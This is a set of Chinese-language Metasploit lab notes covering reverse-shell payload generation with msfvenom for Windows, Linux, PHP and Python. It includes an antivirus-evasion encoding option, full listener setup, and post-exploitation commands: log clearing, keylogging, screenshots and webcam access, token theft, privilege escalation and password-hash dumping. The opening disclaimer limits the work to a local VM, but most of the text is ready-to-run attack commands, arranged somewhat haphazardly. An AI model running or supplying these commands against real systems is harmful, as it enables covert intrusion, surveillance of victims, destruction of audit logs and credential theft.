未经授权禁止任何渗透测试 本次实验都是在本机虚拟机
- 异或编码 -e x86/shikata_ga_nai -i 3 免杀
- linux 生成 payload
- php 生成 payload
- python 生成 payload
- windows 生产payload
- 1. 将自身注入到可信(白名单)进程 可以大大提高session的存活率
- python 文件不落地
- msf 后渗透阶段
- msf命令的具体作用
- msf文件相关命令
- msf portfwd转发端口
- msf portfwd转发端口 3389
- linux_rdesktop 使用
- 清除事件日志 clearev
- execute -f calc.exe 打开应用
- getpid 查看 进程
- kill 杀死进程 pkill 根据名字
- reboot 重启
- shutdown 关机
- steal_token [pid] 偷取令牌
- keyscan_start 键盘监听
- screenshare 实时监控
- screenshot 拍照片
- getsystem 一键shell
- 密码哈希
常见参数
-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
-f, --format < format> 指定输出格式
-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64
-o, --out < path> 指定创建好的payload的存放位置
-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘x0f’、‘x00’
-n, --nopsled < length> 为payload预先指定一个NOP滑动长度
-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小
-i, --iterations < count> 指定payload的编码次数
-c, --add-code < path> 指定一个附加的win32 shellcode文件
-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
-v, --var-name < value> 指定一个自定义的变量,以确定输出格式
-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)
-h,–help 查看帮助选项
–platform < platform> 指定payload的目标平台
抽离 专职生成对应的payload
异或 编码 免杀
msfvenom -l platforms 支持平台
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -o /home/kali/Desktop/test1.exe异或编码 -e x86/shikata_ga_nai -i 3 免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -e x86/shikata_ga_nai -i 3 -o /home/kali/Desktop/test2.exelinux 生成 payload
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf
监听
msf5 > use exploits/multi/handler msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.226.142 lhost => 192.168.226.142 msf5 exploit(multi/handler) > set lport 22456 lport => 22456 msf5 exploit(multi/handler) > exploit
执行
./yui.elf
php 生成 payload生成
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php
监听
msf5 exploit(multi/handler) > use exploit/multi/handler msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.226.142 lhost => 192.168.226.142 msf5 exploit(multi/handler) > set lport 22345 lport => 22345 msf5 exploit(multi/handler) > exploit
执行
msfvenom -p python/meterpreter_reverse_tcp lhost=192.168.226.142 lport=22441 -f raw -o /home/kali/Desktop/shell.py
监听
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22441-f exe -o /home/kali/Desktop/shell.exe
background
sessions -i interactive
- 提权
migrate id
- 将自身注入到可信(白名单)进程 可以大大提高session的存活率
- 提权
f_write = open("./bihuo.txt", "w+");f_write.write("bihuo.cn");f_write.close()
clearev Clear the event log
远程登陆 登录失败
clearev 清除对应的日志
- H 隐藏
-i 代表交互式
execute -H -i -f
p
未经授权禁止任何渗透测试 本次实验都是在本机虚拟机
keyscan_stop 停止
摄像头打开
getsystem密码哈希
命令:
hashdump



